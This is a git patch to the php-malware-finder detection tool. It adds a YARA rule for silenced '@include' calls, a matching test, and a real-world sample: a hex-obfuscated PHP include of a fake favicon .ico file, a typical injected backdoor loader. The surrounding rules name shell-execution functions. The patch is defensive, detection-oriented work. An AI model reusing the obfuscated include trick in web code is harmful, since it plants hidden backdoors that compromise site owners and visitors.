From d9b7742bb7c1179f53429a0d8cab7f0bd04ffe00 Mon Sep 17 00:00:00 2001
From: jvoisin
Date: Tue, 26 Jun 2018 18:37:23 +0200
Subject: Detect things like '@include'

This should close #71
---
 php-malware-finder/php.yar                  | 1 +
 php-malware-finder/samples/real/include.php | 4 ++++
 php-malware-finder/tests.sh                 | 1 +
 3 files changed, 6 insertions(+)
 create mode 100644 php-malware-finder/samples/real/include.php

diff --git a/php-malware-finder/php.yar b/php-malware-finder/php.yar
index 143b192..6a93fe1 100644
--- a/php-malware-finder/php.yar
+++ b/php-malware-finder/php.yar
@@ -102,6 +102,7 @@ rule DodgyPhp
         $double_var = /\${\s*\${/
         $extract = /extract\s*\(\s*\$_(GET|POST|REQUEST|COOKIE|SERVER)/
         $reversed = /noitcnuf_etaerc|metsys|urhtssap|edulcni|etucexe_llehs/ nocase
+				$silenced_include =/@\s*include\s*/ nocase
 
     condition:
         (any of them) and not IsWhitelisted
diff --git a/php-malware-finder/samples/real/include.php b/php-malware-finder/samples/real/include.php
new file mode 100644
index 0000000..58712f1
--- /dev/null
+++ b/php-malware-finder/samples/real/include.php
@@ -0,0 +1,4 @@
+<?php
+/*8a68d*/
+@include "\x2fh\x6fm\x65/\x77e\x62p\x6ce\x78x\x33/\x70u\x62l\x69c\x5fh\x74m\x6c/\x68i\x73-\x68e\x6d.\x6fr\x67/\x5f_\x4dA\x43O\x53X\x2fm\x6fd\x75l\x65s\x2fn\x6fd\x65/\x66a\x76i\x63o\x6e_\x31a\x33f\x384\x2ei\x63o";
+/*8a68d*/
diff --git a/php-malware-finder/tests.sh b/php-malware-finder/tests.sh
index aa6cd33..f53097d 100755
--- a/php-malware-finder/tests.sh
+++ b/php-malware-finder/tests.sh
@@ -89,6 +89,7 @@ run_test real/exceptions.php '$eval_comment: eval/\*k\*/('
 run_test real/nano.php '$nano: $x\[f\]('
 run_test real/ninja.php '$nano: $x\[0\]('
 run_test real/ninja.php '$ninja: base64_decode(substr(getallheaders'
+run_test real/include.php ':$silenced_include: @include'
 
 run_test undetected/smart.php '0x6:$extract:'
 
-- 
cgit v1.3